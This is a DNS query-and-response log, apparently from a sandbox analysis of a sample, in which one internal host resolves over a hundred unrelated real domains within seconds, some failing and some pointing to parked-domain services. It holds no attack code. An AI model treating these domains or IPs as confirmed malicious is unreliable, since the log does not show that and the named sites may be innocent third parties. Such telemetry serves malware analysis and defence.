Mar 22, 2023 05:45:13.675959110 CET	8.8.8.8	192.168.2.5	0x2a1a	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		18.119.154.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.675959110 CET	8.8.8.8	192.168.2.5	0x2a1a	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		3.140.13.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.712884903 CET	8.8.8.8	192.168.2.5	0xaf21	No error (0)	agulatex.com		133.125.38.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.723654032 CET	8.8.8.8	192.168.2.5	0xdfc7	No error (0)	geecl.com		213.175.217.57	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.908641100 CET	8.8.8.8	192.168.2.5	0x6e7e	No error (0)	t-mould.com		81.169.145.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.953370094 CET	8.8.8.8	192.168.2.5	0x5bf6	No error (0)	biosolve.com		151.101.130.159	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.957726002 CET	8.8.8.8	192.168.2.5	0xdf68	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.973402023 CET	8.8.8.8	192.168.2.5	0x6ff2	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.993581057 CET	8.8.8.8	192.168.2.5	0x7f1e	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.021565914 CET	8.8.8.8	192.168.2.5	0x729	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.065200090 CET	8.8.8.8	192.168.2.5	0xeac6	No error (0)	camamat.com		104.21.235.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.065200090 CET	8.8.8.8	192.168.2.5	0xeac6	No error (0)	camamat.com		104.21.235.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.090120077 CET	8.8.8.8	192.168.2.5	0xae40	No error (0)	vdoherty.com		91.216.241.100	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.212094069 CET	8.8.8.8	192.168.2.5	0x2ca	No error (0)	atb-lit.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.233352900 CET	8.8.8.8	192.168.2.5	0x8f8e	No error (0)	xinhui.net		43.255.29.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.262878895 CET	8.8.8.8	192.168.2.5	0x9b10	No error (0)	zupraha.cz		77.78.104.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.279356956 CET	8.8.8.8	192.168.2.5	0xaf77	No error (0)	bigzz.by		178.249.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.293673038 CET	8.8.8.8	192.168.2.5	0xc247	No error (0)	hchc.org		34.224.10.110	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.293673038 CET	8.8.8.8	192.168.2.5	0xc247	No error (0)	hchc.org		52.11.37.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.337197065 CET	8.8.8.8	192.168.2.5	0x1c6	No error (0)	icd-host.com		192.252.159.165	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.337197065 CET	8.8.8.8	192.168.2.5	0x1c6	No error (0)	icd-host.com		192.252.159.116	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.450337887 CET	8.8.8.8	192.168.2.5	0x9ce6	No error (0)	shesfit.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.450337887 CET	8.8.8.8	192.168.2.5	0x9ce6	No error (0)	shesfit.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.455842018 CET	8.8.8.8	192.168.2.5	0x862d	No error (0)	okashimo.com		203.137.75.45	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.494189978 CET	8.8.8.8	192.168.2.5	0x1df0	No error (0)	skypearl.com		153.122.170.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.599217892 CET	8.8.8.8	192.168.2.5	0xa858	No error (0)	infotech.pl		79.96.32.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.622344971 CET	8.8.8.8	192.168.2.5	0x6517	No error (0)	daytonir.com		104.18.40.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.622344971 CET	8.8.8.8	192.168.2.5	0x6517	No error (0)	daytonir.com		172.64.147.213	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.653491020 CET	8.8.8.8	192.168.2.5	0x8438	No error (0)	shittas.com		43.246.117.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.705060959 CET	8.8.8.8	192.168.2.5	0x82a4	No error (0)	dspears.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:14.705060959 CET	8.8.8.8	192.168.2.5	0x82a4	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:14.705060959 CET	8.8.8.8	192.168.2.5	0x82a4	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.705060959 CET	8.8.8.8	192.168.2.5	0x82a4	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.742755890 CET	8.8.8.8	192.168.2.5	0x99e1	No error (0)	host.do		217.79.248.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.830144882 CET	8.8.8.8	192.168.2.5	0xf585	No error (0)	smitko.net		31.15.12.103	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.857148886 CET	8.8.8.8	192.168.2.5	0xeb23	No error (0)	hchc.org		34.224.10.110	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.857148886 CET	8.8.8.8	192.168.2.5	0xeb23	No error (0)	hchc.org		52.11.37.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.986116886 CET	8.8.8.8	192.168.2.5	0xa1a1	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.015224934 CET	8.8.8.8	192.168.2.5	0x9532	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.067428112 CET	8.8.8.8	192.168.2.5	0x90fe	No error (0)	ascc.org.au		203.210.102.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.074111938 CET	8.8.8.8	192.168.2.5	0x1655	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.075952053 CET	8.8.8.8	192.168.2.5	0xa979	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.111694098 CET	8.8.8.8	192.168.2.5	0xabec	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.130624056 CET	8.8.8.8	192.168.2.5	0x4711	No error (0)	karmy.com.pl		185.253.212.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.138267040 CET	8.8.8.8	192.168.2.5	0xc89f	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.228935957 CET	8.8.8.8	192.168.2.5	0x470a	No error (0)	gcss.com		35.186.238.101	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.244132042 CET	8.8.8.8	192.168.2.5	0x46df	No error (0)	yoruksut.com		93.187.206.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.369294882 CET	8.8.8.8	192.168.2.5	0x477f	No error (0)	ikulani.com		157.7.107.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.402440071 CET	8.8.8.8	192.168.2.5	0x57e3	No error (0)	ftmobile.com		199.34.228.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.493370056 CET	8.8.8.8	192.168.2.5	0x93da	No error (0)	ludomemo.com		27.0.174.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.675930023 CET	8.8.8.8	192.168.2.5	0xd102	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.703299999 CET	8.8.8.8	192.168.2.5	0xa988	No error (0)	dwid.de		87.230.93.218	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.732091904 CET	8.8.8.8	192.168.2.5	0xe039	No error (0)	karmy.com.pl		185.253.212.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.759828091 CET	8.8.8.8	192.168.2.5	0x9c57	No error (0)	floopis.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.760029078 CET	8.8.8.8	192.168.2.5	0xd00f	No error (0)	riwn.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.760029078 CET	8.8.8.8	192.168.2.5	0xd00f	No error (0)	riwn.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.760029078 CET	8.8.8.8	192.168.2.5	0xd00f	No error (0)	riwn.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.760029078 CET	8.8.8.8	192.168.2.5	0xd00f	No error (0)	riwn.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.824073076 CET	8.8.8.8	192.168.2.5	0xe597	No error (0)	paraski.org		94.130.164.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.845616102 CET	8.8.8.8	192.168.2.5	0x81ef	No error (0)	vfcindia.com		68.71.135.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.882515907 CET	8.8.8.8	192.168.2.5	0xb496	No error (0)	any-s.net		108.170.12.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.887682915 CET	8.8.8.8	192.168.2.5	0xcc38	No error (0)	com-edit.fr		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.893101931 CET	8.8.8.8	192.168.2.5	0x271a	No error (0)	pers.com		192.124.249.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.932976961 CET	8.8.8.8	192.168.2.5	0xc3b4	No error (0)	shztm.ru		62.122.170.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.037183046 CET	8.8.8.8	192.168.2.5	0x6ff2	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.138669014 CET	8.8.8.8	192.168.2.5	0xe3b4	No error (0)	sgk.home.pl		89.161.136.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.236249924 CET	8.8.8.8	192.168.2.5	0x133e	No error (0)	roewer.de		45.142.176.225	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.261096001 CET	8.8.8.8	192.168.2.5	0xa0b5	No error (0)	geecl.com		213.175.217.57	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.280693054 CET	8.8.8.8	192.168.2.5	0x799a	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.306677103 CET	8.8.8.8	192.168.2.5	0xe77d	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.332518101 CET	8.8.8.8	192.168.2.5	0x6dd0	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.403743982 CET	8.8.8.8	192.168.2.5	0x4294	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.414175034 CET	8.8.8.8	192.168.2.5	0x323	No error (0)	kamptal.at		128.204.134.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.550932884 CET	8.8.8.8	192.168.2.5	0x292d	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.552485943 CET	8.8.8.8	192.168.2.5	0x3111	No error (0)	bible.org		104.20.55.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.552485943 CET	8.8.8.8	192.168.2.5	0x3111	No error (0)	bible.org		172.67.33.95	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.552485943 CET	8.8.8.8	192.168.2.5	0x3111	No error (0)	bible.org		104.20.54.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.558744907 CET	8.8.8.8	192.168.2.5	0xa3b8	No error (0)	nrsi.com		76.223.35.103	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.753686905 CET	8.8.8.8	192.168.2.5	0x3178	No error (0)	invictus.pl		193.107.88.74	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.767142057 CET	8.8.8.8	192.168.2.5	0xe053	No error (0)	duiops.net		135.125.108.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.773884058 CET	8.8.8.8	192.168.2.5	0x370e	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.848753929 CET	8.8.8.8	192.168.2.5	0x3190	No error (0)	www.fnw.us	fnw.us		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:16.848753929 CET	8.8.8.8	192.168.2.5	0x3190	No error (0)	fnw.us		137.118.26.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.900388956 CET	8.8.8.8	192.168.2.5	0x123b	Name error (3)	www.wkhk.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.914752960 CET	8.8.8.8	192.168.2.5	0x4631	Server failure (2)	www.ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.989646912 CET	8.8.8.8	192.168.2.5	0xd3f9	No error (0)	wanoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.989646912 CET	8.8.8.8	192.168.2.5	0xd3f9	No error (0)	wanoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.994338989 CET	8.8.8.8	192.168.2.5	0x4922	No error (0)	biosolve.com		151.101.130.159	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.081501007 CET	8.8.8.8	192.168.2.5	0xb0f4	No error (0)	johnlyon.org		141.193.213.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.125088930 CET	8.8.8.8	192.168.2.5	0xb5c7	No error (0)	vvsteknik.dk		185.31.76.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.234651089 CET	8.8.8.8	192.168.2.5	0xdc3b	No error (0)	tozzhin.com		202.94.166.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.502041101 CET	8.8.8.8	192.168.2.5	0xeeb1	Name error (3)	www.jroy.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.539331913 CET	8.8.8.8	192.168.2.5	0xccdb	No error (0)	kumaden.com		49.212.180.178	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.586297035 CET	8.8.8.8	192.168.2.5	0x5f6a	No error (0)	nme.co.jp		203.0.113.0	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.706271887 CET	8.8.8.8	192.168.2.5	0xbdea	Name error (3)	www.owsports.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.760313034 CET	8.8.8.8	192.168.2.5	0x7709	No error (0)	mondopp.net		173.231.184.124	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.764820099 CET	8.8.8.8	192.168.2.5	0x4432	No error (0)	e-kami.net		202.172.28.89	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.771749020 CET	8.8.8.8	192.168.2.5	0xc0f8	No error (0)	cutchie.com		199.59.243.223	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.842763901 CET	8.8.8.8	192.168.2.5	0xc597	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.907825947 CET	8.8.8.8	192.168.2.5	0xd97b	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.947638988 CET	8.8.8.8	192.168.2.5	0xe5da	No error (0)	ftmobile.com		199.34.228.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.958625078 CET	8.8.8.8	192.168.2.5	0x90d2	No error (0)	ludomemo.com		27.0.174.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.973618984 CET	8.8.8.8	192.168.2.5	0xa011	No error (0)	k-nikko.com		18.177.67.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.048306942 CET	8.8.8.8	192.168.2.5	0x82b1	No error (0)	dspears.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:18.048306942 CET	8.8.8.8	192.168.2.5	0x82b1	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:18.048306942 CET	8.8.8.8	192.168.2.5	0x82b1	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.048306942 CET	8.8.8.8	192.168.2.5	0x82b1	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.110153913 CET	8.8.8.8	192.168.2.5	0xf19d	Name error (3)	www.udesign.biz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.154185057 CET	8.8.8.8	192.168.2.5	0x6fc	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.166877985 CET	8.8.8.8	192.168.2.5	0x3b0e	No error (0)	esmoke.net		204.15.134.44	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.171243906 CET	8.8.8.8	192.168.2.5	0x57cb	Name error (3)	www.medisa.info	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.181739092 CET	8.8.8.8	192.168.2.5	0xa2ef	No error (0)	www.synetik.net	synetik.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:18.181739092 CET	8.8.8.8	192.168.2.5	0xa2ef	No error (0)	synetik.net		193.166.255.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.363722086 CET	8.8.8.8	192.168.2.5	0xbb74	No error (0)	4locals.net		80.82.115.227	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.470627069 CET	8.8.8.8	192.168.2.5	0x8228	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.497829914 CET	8.8.8.8	192.168.2.5	0x7a20	No error (0)	alexpope.biz		76.74.184.61	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.704660892 CET	8.8.8.8	192.168.2.5	0xe133	No error (0)	amic.at		78.46.224.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.756131887 CET	8.8.8.8	192.168.2.5	0x681e	No error (0)	ftmobile.com		199.34.228.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.787352085 CET	8.8.8.8	192.168.2.5	0xb7e0	No error (0)	tcpoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.787352085 CET	8.8.8.8	192.168.2.5	0xb7e0	No error (0)	tcpoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.802165985 CET	8.8.8.8	192.168.2.5	0xccac	No error (0)	acraloc.com		192.64.150.164	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.835083008 CET	8.8.8.8	192.168.2.5	0xc597	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.867944956 CET	8.8.8.8	192.168.2.5	0xef9e	No error (0)	pellys.co.uk		77.72.4.226	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.897569895 CET	8.8.8.8	192.168.2.5	0x5d47	No error (0)	valselit.com		193.70.68.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.900691032 CET	8.8.8.8	192.168.2.5	0x51c5	No error (0)	envogen.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.900691032 CET	8.8.8.8	192.168.2.5	0x51c5	No error (0)	envogen.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.908255100 CET	8.8.8.8	192.168.2.5	0xcd2	No error (0)	cubodown.com		104.21.30.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.908255100 CET	8.8.8.8	192.168.2.5	0xcd2	No error (0)	cubodown.com		172.67.150.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.938498974 CET	8.8.8.8	192.168.2.5	0x884a	No error (0)	notis.ru		185.178.208.141	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.996313095 CET	8.8.8.8	192.168.2.5	0x39a2	No error (0)	refintl.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.996313095 CET	8.8.8.8	192.168.2.5	0x39a2	No error (0)	refintl.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.996313095 CET	8.8.8.8	192.168.2.5	0x39a2	No error (0)	refintl.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.996313095 CET	8.8.8.8	192.168.2.5	0x39a2	No error (0)	refintl.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.042853117 CET	8.8.8.8	192.168.2.5	0xe2ce	No error (0)	epc.com.au		103.4.16.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.155419111 CET	8.8.8.8	192.168.2.5	0xf037	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.157812119 CET	8.8.8.8	192.168.2.5	0xb68d	No error (0)	nettlinx.org		202.53.77.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.157879114 CET	8.8.8.8	192.168.2.5	0xe18c	Name error (3)	www.koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.164043903 CET	8.8.8.8	192.168.2.5	0x327a	No error (0)	akdeniz.nl		109.71.54.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.330686092 CET	8.8.8.8	192.168.2.5	0x82e1	No error (0)	nettle.pl		195.128.140.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.357455969 CET	8.8.8.8	192.168.2.5	0x31ad	No error (0)	www.usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.375895023 CET	8.8.8.8	192.168.2.5	0xa1a4	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.384399891 CET	8.8.8.8	192.168.2.5	0xbab0	No error (0)	webavant.com		148.72.176.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.425929070 CET	8.8.8.8	192.168.2.5	0xf354	No error (0)	vivastay.com	traff-3.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:19.425929070 CET	8.8.8.8	192.168.2.5	0xf354	No error (0)	traff-3.hugedomains.com	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:19.425929070 CET	8.8.8.8	192.168.2.5	0xf354	No error (0)	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		3.18.7.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.425929070 CET	8.8.8.8	192.168.2.5	0xf354	No error (0)	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		3.19.116.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.437726974 CET	8.8.8.8	192.168.2.5	0x360a	No error (0)	biurohera.pl		79.96.161.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.437726974 CET	8.8.8.8	192.168.2.5	0x360a	No error (0)	biurohera.pl		54.36.175.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.458370924 CET	8.8.8.8	192.168.2.5	0x1fae	No error (0)	cbras.com		54.39.198.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.559390068 CET	8.8.8.8	192.168.2.5	0x69cd	No error (0)	arowines.com		104.164.117.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.603719950 CET	8.8.8.8	192.168.2.5	0xed5b	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.716025114 CET	8.8.8.8	192.168.2.5	0x54ed	No error (0)	vvsteknik.dk		185.31.76.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.716758013 CET	8.8.8.8	192.168.2.5	0xc17d	No error (0)	mcseurope.nl		46.19.218.80	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.829205990 CET	8.8.8.8	192.168.2.5	0x882b	No error (0)	cjcagent.com		157.112.187.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.882253885 CET	8.8.8.8	192.168.2.5	0xc597	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.946782112 CET	8.8.8.8	192.168.2.5	0xca33	No error (0)	yasuma.com		61.200.81.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.146759987 CET	8.8.8.8	192.168.2.5	0x2940	No error (0)	kamptal.at		128.204.134.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.156837940 CET	8.8.8.8	192.168.2.5	0xa34f	No error (0)	kairel.com		54.217.118.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.307742119 CET	8.8.8.8	192.168.2.5	0xae9b	No error (0)	btsi.com.ph		69.46.30.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.311191082 CET	8.8.8.8	192.168.2.5	0x5186	No error (0)	nettle.pl		195.128.140.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.312078953 CET	8.8.8.8	192.168.2.5	0x27a9	No error (0)	invictus.pl		193.107.88.74	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.324974060 CET	8.8.8.8	192.168.2.5	0xb2b	No error (0)	fogra.com.pl		85.128.55.51	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.446346045 CET	8.8.8.8	192.168.2.5	0x454	No error (0)	envogen.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.446346045 CET	8.8.8.8	192.168.2.5	0x454	No error (0)	envogen.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.470726013 CET	8.8.8.8	192.168.2.5	0x2e38	Name error (3)	anteph.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.497221947 CET	8.8.8.8	192.168.2.5	0x1a20	No error (0)	bd-style.com		107.165.223.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.523379087 CET	8.8.8.8	192.168.2.5	0x4e8f	No error (0)	mijash3.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.523379087 CET	8.8.8.8	192.168.2.5	0x4e8f	No error (0)	mijash3.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.523379087 CET	8.8.8.8	192.168.2.5	0x4e8f	No error (0)	mijash3.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.523379087 CET	8.8.8.8	192.168.2.5	0x4e8f	No error (0)	mijash3.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.526398897 CET	8.8.8.8	192.168.2.5	0x2055	No error (0)	hchc.org		34.224.10.110	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.526398897 CET	8.8.8.8	192.168.2.5	0x2055	No error (0)	hchc.org		52.11.37.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.964709044 CET	8.8.8.8	192.168.2.5	0x6aa7	No error (0)	shiner.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.964709044 CET	8.8.8.8	192.168.2.5	0x6aa7	No error (0)	shiner.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.136040926 CET	8.8.8.8	192.168.2.5	0x5e93	No error (0)	pertex.com		185.151.30.147	A (IP address)	IN (0x0001)	false
